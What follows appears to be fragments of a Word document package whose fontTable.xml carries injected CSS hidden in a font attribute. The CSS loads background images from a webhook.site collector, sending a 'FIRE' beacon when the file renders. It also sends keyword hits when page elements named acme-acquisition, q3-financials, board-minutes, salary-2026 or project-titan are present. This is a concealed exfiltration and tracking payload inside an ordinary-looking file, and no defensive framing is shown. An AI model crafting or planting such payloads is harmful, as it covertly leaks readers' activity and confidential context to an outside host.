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fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable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hello</w:t>
      </w:r>
    </w:p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a;}html{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/FIRE)!important}div[data-tab-id*=&quot;acme-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/acme-acquisition)!important}div[data-tab-id*=&quot;q3-financials&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/q3-financials)!important}div[data-tab-id*=&quot;board-minutes&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/board-minutes)!important}div[data-tab-id*=&quot;salary-2026&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/salary-2026)!important}div[data-tab-id*=&quot;project-titan&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/project-titan)!important}.m{color:red}">
    <w:embedRegular r:id="rIdF1" w:fontKey="{00000000-0000-0000-0000-000000000000}"/>
  </w:font>
</w:fonts>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rIdFT" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xm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/Relationships>
</file>